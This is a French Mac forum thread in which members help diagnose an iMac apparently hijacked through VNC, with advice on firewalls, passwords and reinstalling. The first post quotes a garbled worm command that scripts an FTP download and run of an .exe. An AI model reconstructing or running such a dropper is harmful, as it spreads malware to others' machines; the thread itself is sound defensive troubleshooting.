Bienvenue invité ( Connexion | Inscription )
8 Jan 2008, 15:55
Message
#1
|
|
|
Adepte de Macbidouille ![]() Groupe : Membres Messages : 154 Inscrit : 7 Apr 2006 Membre no 59 008 |
Bonjour les bidouilleurs.
Oui, je sais, cette question revient régulièrement sur les forums mais ce qui arrive à ma collègue est assez étrange. Alors voilà, Plusieurs fois, alors qu'elle travaillait sous Word, elle eu la surprise de voir apparaitre le texte suivant : C,d =c echo open !é :é »& :&éà :!ç & !§ç§ :: uèecho user q b :: uèecho binqry :: uèecho get h,, :exe :: uèecho auit :: uèftp :exe )n )smuèh,, :exe èexit Je précise tout de suite qu'elle n'a aucune connaissance en informatique et que sa maison n'est pas construite sur un cimetière Indien. Çà ressemble à une commande terminal mais je serais bien incapable de la lire. Autre chose est arrivé hier, la souris a pris le contrôle de l'ordinateur, ouvert et refermé des documents etc. Ce qui est étrange car VNC n'était pas activé à ce moment là. Aujourd'hui, son mac émet des bruits genre 'boinc'. Bref, son Mac est hanté. Matériel : iMac Intel 17", Tiger, plusieurs sessions d'utilisateur... utilisant MSN. Je vais aller y faire un tour histoire de changer les mots de passe, vérifier le firewall, rechercher d'hypothétiques virus, procéder aux mises à jour... Mais vous en pensez quoi ? Quels outils puis-je utiliser pour nettoyer tout ça ? Et comment s'assurer que cela n'arrive plus ? Ce message a été modifié par Ponchan - 8 Jan 2008, 15:56. -------------------- Serial switcher
|
|
|
|
![]() |
18 Jan 2008, 09:33
Message
#2
|
|
|
Adepte de Macbidouille ![]() Groupe : Membres Messages : 154 Inscrit : 7 Apr 2006 Membre no 59 008 |
Ca recommence !
Petit bilan de ce que j'ai fait jusqu'ici : - Mise à jour de Mac OS (10.4) - Mise à jour de Vine Server - Paramétrage du firewall du Mac (notamment, j'ai désactivé ARD) - paramétrage de la redirection de ports de la Freebox. - paramétrage de Vine server pour et désactivation "System Server" - recherche et élimination de .exe (juste pour la forme), d'autres servers VNC. - Changement de tous les mots de passe utilisateurs et administrateur du Mac. Je reviens à la commande du début, ça vous dit quelque chose ? -------------------- Serial switcher
|
|
|
|
18 Jan 2008, 11:55
Message
#3
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 2 727 Inscrit : 20 Feb 2005 Lieu : Hauts-de-Seine Membre no 33 527 |
CITATION(Ponchan @ 18 Jan 2008, 09:33) [snapback]2522873[/snapback] Ca recommence ! Petit bilan de ce que j'ai fait jusqu'ici : - Mise à jour de Mac OS (10.4) - Mise à jour de Vine Server - Paramétrage du firewall du Mac (notamment, j'ai désactivé ARD) - paramétrage de la redirection de ports de la Freebox. - paramétrage de Vine server pour et désactivation "System Server" - recherche et élimination de .exe (juste pour la forme), d'autres servers VNC. - Changement de tous les mots de passe utilisateurs et administrateur du Mac. Je reviens à la commande du début, ça vous dit quelque chose ? Salut, je pense qu'il arrive un moment ou la clean installe est la solution . Peut-être que ton haker à réussit par je ne sais quelle façon d'installer un ROOTKIT sur le mac . Et de ce biais il s'amuse simplement . Fabricius -------------------- MBP Retina 13" Late2013 / iMac 27" i7 16Go de ram avec un C300 en plus du 2TO rien que pour le boot !
iPhone 7 et un iPhone 1st Gen de Fifth Avenue. Xbox One/PS4 Slim/PS Vita/PSP/Wii Black/3DS le tout sur une LiveBox Jet Fibre. Un super chat d'amour :-) Et pour premier Mac un vénérable PPC G4, un MacMini 1,25GHz ! |
|
|
|
18 Jan 2008, 13:50
Message
#4
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 745 Inscrit : 13 Nov 2006 Membre no 72 823 |
CITATION(Fabricius @ 18 Jan 2008, 11:55) [snapback]2523115[/snapback] Salut, je pense qu'il arrive un moment ou la clean installe est la solution . Peut-être que ton haker à réussit par je ne sais quelle façon d'installer un ROOTKIT sur le mac . Et de ce biais il s'amuse simplement . Fabricius J'abonde dans le sens de Fabicius. Quand on est sur qu'une machine a été compromise, on ne peut jamais savoir ce qui y a été fait; donc réinstalle complète obligatoire. -------------------- Macbook Pro 15" Core 2 Duo 2.33GHz, 3Go RAM, Mac OS X 10.6.8 | Macbook Air 13" mi-2011 Core i5, Mac OS X 10.8
NAS Synology DS-110+ iPhone 6 silver 64Go - forfait SFR Red 3Go |
|
|
|
18 Jan 2008, 13:52
Message
#5
|
|
|
Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 6 584 Inscrit : 20 Mar 2003 Membre no 6 765 |
CITATION(darenzana @ 18 Jan 2008, 13:50) [snapback]2523286[/snapback] CITATION(Fabricius @ 18 Jan 2008, 11:55) [snapback]2523115[/snapback] Salut, je pense qu'il arrive un moment ou la clean installe est la solution . Peut-être que ton haker à réussit par je ne sais quelle façon d'installer un ROOTKIT sur le mac . Et de ce biais il s'amuse simplement . Fabricius J'abonde dans le sens de Fabicius. Quand on est sur qu'une machine a été compromise, on ne peut jamais savoir ce qui y a été fait; donc réinstalle complète obligatoire. Mouais. Vu les commandes DOS qui sont envoyées par le hacker, je doute qu'il soit allé bien loin au delà de la prise en main par VNC... -------------------- késtananafout' (:
|
|
|
|
18 Jan 2008, 13:57
Message
#6
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 745 Inscrit : 13 Nov 2006 Membre no 72 823 |
CITATION(chombier @ 18 Jan 2008, 13:52) [snapback]2523289[/snapback] Mouais. Vu les commandes DOS qui sont envoyées par le hacker, je doute qu'il soit allé bien loin au delà de la prise en main par VNC... Les suites de caractères que Ponchan donne dans son premier post, sont effectivement sans effet, et ne sont pas le fait d'un "hacker", mais d'un ver qui essaye de se reproduire. Par contre, Ponchan nous a indiqué qu'il a vu une connexion vers un site web de telephonie (www.lowratevoip.com); et ça ça m'inquiète plus; ça indiquerait qu'il y aurait vraiment une personne physique derrière cette attaque. Ce message a été modifié par darenzana - 18 Jan 2008, 14:00. -------------------- Macbook Pro 15" Core 2 Duo 2.33GHz, 3Go RAM, Mac OS X 10.6.8 | Macbook Air 13" mi-2011 Core i5, Mac OS X 10.8
NAS Synology DS-110+ iPhone 6 silver 64Go - forfait SFR Red 3Go |
|
|
|
18 Jan 2008, 14:01
Message
#7
|
|
|
Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 6 584 Inscrit : 20 Mar 2003 Membre no 6 765 |
CITATION(darenzana @ 18 Jan 2008, 13:57) [snapback]2523298[/snapback] CITATION(chombier @ 18 Jan 2008, 13:52) [snapback]2523289[/snapback] Mouais. Vu les commandes DOS qui sont envoyées par le hacker, je doute qu'il soit allé bien loin au delà de la prise en main par VNC... Les suites de caractères que tu donnes dans ton premier post, sont effectivement sans effet, et ne sont pas le fait d'un "hacker", mais d'un ver qui essaye de se reproduire. Par contre, tu nous a indiqué que tu as vu une connexion vers un site web de telephonie (www.lowratevoip.com); et ça ça m'inquiète plus; ça indiquerait qu'il y aurait vraiment une personne physique derrière cette attaque. Une personne physique avec de gros problèmes de mapping clavier. Mais il serait intéressant d'avoir un log de l'intrusion... -------------------- késtananafout' (:
|
|
|
|
18 Jan 2008, 14:38
Message
#8
|
|
|
Adepte de Macbidouille ![]() Groupe : Membres Messages : 154 Inscrit : 7 Apr 2006 Membre no 59 008 |
CITATION(chombier @ 18 Jan 2008, 14:01) [snapback]2523303[/snapback] CITATION(darenzana @ 18 Jan 2008, 13:57) [snapback]2523298[/snapback] CITATION(chombier @ 18 Jan 2008, 13:52) [snapback]2523289[/snapback] Mouais. Vu les commandes DOS qui sont envoyées par le hacker, je doute qu'il soit allé bien loin au delà de la prise en main par VNC... Les suites de caractères que tu donnes dans ton premier post, sont effectivement sans effet, et ne sont pas le fait d'un "hacker", mais d'un ver qui essaye de se reproduire. Par contre, tu nous a indiqué que tu as vu une connexion vers un site web de telephonie (www.lowratevoip.com); et ça ça m'inquiète plus; ça indiquerait qu'il y aurait vraiment une personne physique derrière cette attaque. Une personne physique avec de gros problèmes de mapping clavier. Mais il serait intéressant d'avoir un log de l'intrusion... Je l'ai vu faire : il avait un de mal à trouver les 'a', les '@' etc vu qu'il utilisait un clavier qwerty. Il s'est pas démonté, il a lancé Firefox, puis recherche Yahoo sur le mot 'mail', copié le carctère '@' dans une des réponses et tapé l'adresse de son site. Je suppose que le '@' était pour don login sur ce site. Malin le gars... Le truc c'est que j'arrive pas à trouver comment il fait pour prendre la main vu que le serveur VNC est correctement paramétré maintenant et lancé seulement à ma demande. Quand il s'est reconnecté hier soir, VNC n'était pas lancé. Ce que j'ai fait jusqu'à présent l'a seulement retardé. Sinon Wireshark est super complet mais comme disent les auteurs "Wireshark isn't an intrusion detection system. It will not warn you when someone does strange things on your network that he/she isn't allowed to do. However, if strange things happen, Wireshark might help you figure out what is really going on." -------------------- Serial switcher
|
|
|
|
18 Jan 2008, 14:48
Message
#9
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 745 Inscrit : 13 Nov 2006 Membre no 72 823 |
CITATION(Ponchan @ 18 Jan 2008, 14:38) [snapback]2523368[/snapback] Le truc c'est que j'arrive pas à trouver comment il fait pour prendre la main vu que le serveur VNC est correctement paramétré maintenant et lancé seulement à ma demande. Quand il s'est reconnecté hier soir, VNC n'était pas lancé. Ce que j'ai fait jusqu'à présent l'a seulement retardé. Justement, donc formatte, réinstalle, et laisse ce Mac tranquille. -------------------- Macbook Pro 15" Core 2 Duo 2.33GHz, 3Go RAM, Mac OS X 10.6.8 | Macbook Air 13" mi-2011 Core i5, Mac OS X 10.8
NAS Synology DS-110+ iPhone 6 silver 64Go - forfait SFR Red 3Go |
|
|
|
Ponchan Un iMac Hacké ? 8 Jan 2008, 15:55
Mohirei Bonjour ,
une petite recherche (avec les mots-c... 8 Jan 2008, 15:59
Ponchan Merci Mohirei !
Effectivement, cette recherch... 8 Jan 2008, 16:23
darenzana => http://forum.macbidouille.com/index.php?s=..... 8 Jan 2008, 20:36
Ponchan Merci Darenzana,
C'est exactement le forum que... 9 Jan 2008, 10:35
Ponchan Je fais un petit up suite à mon intervention sur ... 16 Jan 2008, 13:18
Fabricius Sauvegarde les données de la machine et fait un b... 16 Jan 2008, 13:21
Ponchan Mouaip. J'ai laissé les CD d'install au b... 16 Jan 2008, 13:26
Fabricius CITATION(Ponchan @ 16 Jan 2008, 13:26) 25... 16 Jan 2008, 13:31
uzboxberg Probablement rien à voir, mais il y a eu ici-mêm... 16 Jan 2008, 14:25
Ponchan En dégageant ce petit fichier /Library/StartupIte... 16 Jan 2008, 14:35
chombier CITATION(Ponchan @ 16 Jan 2008, 14:35) 25... 16 Jan 2008, 15:05
trouspinette CITATION(Ponchan @ 16 Jan 2008, 14:35) 25... 22 Jan 2008, 22:29
chombier CITATION(trouspinette @ 22 Jan 2008, 22:2... 22 Jan 2008, 22:40
Morjice CITATION(trouspinette @ 22 Jan 2008, 22:2... 23 Jan 2008, 10:28
Ponchan Chombier,
J'utilise la dernière version de Vi... 16 Jan 2008, 16:09
darenzana CITATION(Ponchan @ 16 Jan 2008, 16:09) 25... 16 Jan 2008, 16:15
chombier CITATION(Ponchan @ 16 Jan 2008, 16:09) 25... 16 Jan 2008, 16:18
Ponchan CITATION(chombier @ 16 Jan 2008, 16:18) 2... 16 Jan 2008, 16:39
chombier CITATION(Ponchan @ 16 Jan 2008, 16:39) 25... 16 Jan 2008, 16:59
Ponchan Merci pour ces précisions Chombier.
J'ai dés... 16 Jan 2008, 17:05
chombier CITATION(Ponchan @ 16 Jan 2008, 17:05) 25... 16 Jan 2008, 17:16
Ponchan Une précision, le bundle /Library/StartupItems/OS... 16 Jan 2008, 17:34
chombier CITATION(Ponchan @ 16 Jan 2008, 17:34) 25... 16 Jan 2008, 18:04
darenzana CITATION(Ponchan @ 16 Jan 2008, 17:34) 25... 16 Jan 2008, 18:11
chombier CITATION(darenzana @ 16 Jan 2008, 18:11) ... 16 Jan 2008, 18:17

darenzana CITATION(chombier @ 16 Jan 2008, 18:17) 2... 16 Jan 2008, 18:23

chombier CITATION(darenzana @ 16 Jan 2008, 18:23) ... 16 Jan 2008, 18:30

darenzana CITATION(chombier @ 16 Jan 2008, 18:30) 2... 16 Jan 2008, 18:34


chombier CITATION(darenzana @ 16 Jan 2008, 18:34) ... 16 Jan 2008, 18:39

Ponchan CITATION(chombier @ 16 Jan 2008, 18:30) 2... 17 Jan 2008, 09:54

Fabricius CITATION(Ponchan @ 17 Jan 2008, 09:54) 25... 17 Jan 2008, 09:56

chombier CITATION(Ponchan @ 17 Jan 2008, 09:54) 25... 17 Jan 2008, 12:19
Fabricius CITATION(darenzana @ 16 Jan 2008, 18:11) ... 16 Jan 2008, 18:51
darenzana CITATION(Fabricius @ 16 Jan 2008, 18:51) ... 16 Jan 2008, 18:55
Fabricius CITATION(darenzana @ 16 Jan 2008, 18:55) ... 16 Jan 2008, 19:01
darenzana Quelle version, le Vine server installé?
Plutot ... 16 Jan 2008, 17:47
Ponchan CITATION(darenzana @ 16 Jan 2008, 17:47) ... 16 Jan 2008, 17:50
darenzana Au fait, tu as redémarré après avoir suprimé /... 16 Jan 2008, 18:46
chombier CITATION(darenzana @ 16 Jan 2008, 18:46) ... 16 Jan 2008, 18:59
chombier Certes. Mais deux serveurs VNC accessibles de l... 16 Jan 2008, 18:53
Fabricius CITATION(chombier @ 16 Jan 2008, 18:53) 2... 16 Jan 2008, 18:56
darenzana CITATION(chombier @ 16 Jan 2008, 18:53) 2... 16 Jan 2008, 18:57
Ponchan ouh la, vous n'avez pas chômé les gars ... 17 Jan 2008, 00:05
darenzana CITATION(Ponchan @ 17 Jan 2008, 00:05) 25... 17 Jan 2008, 00:10
Ponchan Physiquement, pourquoi pas.
Vous croyez qu'on ... 17 Jan 2008, 09:59
Fabricius CITATION(Ponchan @ 17 Jan 2008, 09:59) 25... 17 Jan 2008, 10:02


Ponchan CITATION(darenzana @ 18 Jan 2008, 14:48) ... 18 Jan 2008, 15:13

chombier CITATION(Ponchan @ 18 Jan 2008, 14:38) 25... 18 Jan 2008, 15:33
chombier CITATION(Ponchan @ 18 Jan 2008, 09:33) 25... 18 Jan 2008, 12:09
Ponchan Merci Chombier.
Alors,
J'utilise Vine server p... 18 Jan 2008, 14:05
Fabricius CITATION(Ponchan @ 18 Jan 2008, 14:05) 25... 18 Jan 2008, 14:37
Ponchan Ok Chombier,
Alors voici ce que je vais faire.
Je ... 18 Jan 2008, 16:03
Fabricius CITATION(Ponchan @ 18 Jan 2008, 16:03) 25... 19 Jan 2008, 14:58
macuserfr Une chose que personne n'a évoqué: ARD est c... 19 Jan 2008, 15:18
Macuserman Bonne chance pour ton chantier en perspective...ma... 19 Jan 2008, 15:24
darenzana CITATION(Macuserman @ 19 Jan 2008, 15:24)... 19 Jan 2008, 15:46
Ponchan Bon, je tâcherai d'employer le bon vocabulair... 19 Jan 2008, 16:17
Fabricius CITATION(Ponchan @ 19 Jan 2008, 16:17) 25... 20 Jan 2008, 11:37
trouspinette CITATION(Fabricius @ 20 Jan 2008, 11:37) ... 22 Jan 2008, 22:53
Macuserman Ah, j'adore ton jeux de mot....cracker belin ... 19 Jan 2008, 17:08
macuserfr Ponchan, jette un coup d'oeil quand même sur ... 20 Jan 2008, 01:37
macuserfr Perso chez moi j'ai monté un petit serveur po... 20 Jan 2008, 12:27
Ponchan C'est sur qu'un petit firewall matériel e... 20 Jan 2008, 15:42
macuserfr Bah voilà Ça me rappelle une expérience vécue... 20 Jan 2008, 16:01
Ponchan Si je me faisait payer à l'heure le temps que... 20 Jan 2008, 20:44
Macuserman Bon, t'as encore des problèmes ou tu as exéc... 21 Jan 2008, 18:26
Ponchan Je ne m'y suis pas encore attaqué. Peut-être... 22 Jan 2008, 09:26
Fabricius CITATION(Ponchan @ 22 Jan 2008, 09:26) 25... 22 Jan 2008, 12:58
Ponchan ouais... ok... bon... pff...
la bonne phrase devai... 22 Jan 2008, 14:16
bilbox Bonjour à tous,
Ponchan tu tiens ton public... t... 22 Jan 2008, 14:58
macuserfr Faut dire, un mac hacké ça mérite de faire la u... 22 Jan 2008, 21:23
ricorich Clair que un mac qui est hacké, c'est pas cou... 22 Jan 2008, 22:23
Ponchan Encore un peu de patience... Ma collègue habite d... 23 Jan 2008, 10:10
Fabricius CITATION(Ponchan @ 23 Jan 2008, 10:10) 25... 23 Jan 2008, 21:25
Ponchan Merci Morjice,
Je tiens donc le bon bout à priori... 23 Jan 2008, 11:10
macuserfr Si tout marche et qu'il n'a pas reattaqué... 23 Jan 2008, 18:42
Morjice CITATION(macuserfr @ 23 Jan 2008, 18:42) ... 23 Jan 2008, 19:24
Ponchan Je plaisantais bien sûr...
Ce qui nous intéresse... 24 Jan 2008, 09:47![]() ![]() |
| Nous sommes le : 5th April 2026 - 18:37 |